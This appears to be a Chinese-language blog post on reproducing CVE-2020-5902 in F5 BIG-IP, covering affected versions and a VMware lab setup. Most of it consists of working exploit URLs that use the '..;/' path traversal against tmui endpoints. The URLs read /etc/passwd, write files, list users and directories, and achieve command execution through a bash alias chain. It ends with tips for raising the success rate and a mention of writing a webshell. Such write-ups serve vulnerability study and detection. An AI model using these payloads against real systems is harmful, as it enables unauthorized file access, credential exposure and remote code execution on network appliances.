前言

最近工作中遇到一个漏洞:CVE-2020-5902,是一个个针对F5 BIG-IP的漏洞

漏洞环境搭建

开始我以为这套设备是收费的,所以在fofa搜索F5的资产,最后发现官网注册了就可以下,不过也找了一会儿,因为不是所有的版本都可以复现的

受影响的版本:


F5 BIG-IP 15.x:15.0.0 - 15.1.0
F5 BIG-IP 14.x:14.1.0 - 14.1.2
F5 BIG-IP 13.x:13.1.0 - 13.1.3
F5 BIG-IP 12.x:12.1.0 - 12.1.5
F5 BIG-IP 11.x:11.6.1 - 11.6.5

这里提供一下我找到能复现成功的vmware部署模板,已经传到网盘上了:飞机直达

部署没有什么可说的,直接vmware打开就行了
系统的默认密码是root/default, 登录以后会要求改密码

然后config,可以看到ip地址:

然后打开 https://ip

使用admin/你修改的密码登录,会再次要求更改密码,然后登陆:

环境就搭建好了

任意文件读取

https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

任意文件写入

https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp

在系统中查看一下:

这里继续用任意文件读取查看一下刚刚写入的文件:

列出认证用户

https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user

列出目录

https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/

RCE

https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash

https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/cmd&content=id

https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/cmd

最后还原一下:
https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list

检测工具

Github地址:飞机直达

漏洞检测

文件读取

RCE

写在最后

  1. 如果list auth user或者list /tmp/cmd.txt返回空,多repeat几次或者intruder可能就有返回了
  2. 即使返回空,也可能rce
  3. 据说rce的post成功率大于get
  4. 据说要近期有管理员登录过才有返回值
  5. list auth user能稳定返回值,rce成功率高
  6. 写webshell返回500可能缺少ecj-4.4.jar
  7. 记得还原list命令,删除或者覆盖命令文件
  8. 遇到返回500或者返回error错误,多repeat几次可能就正常了
最后修改:2020 年 09 月 04 日 11 : 54 PM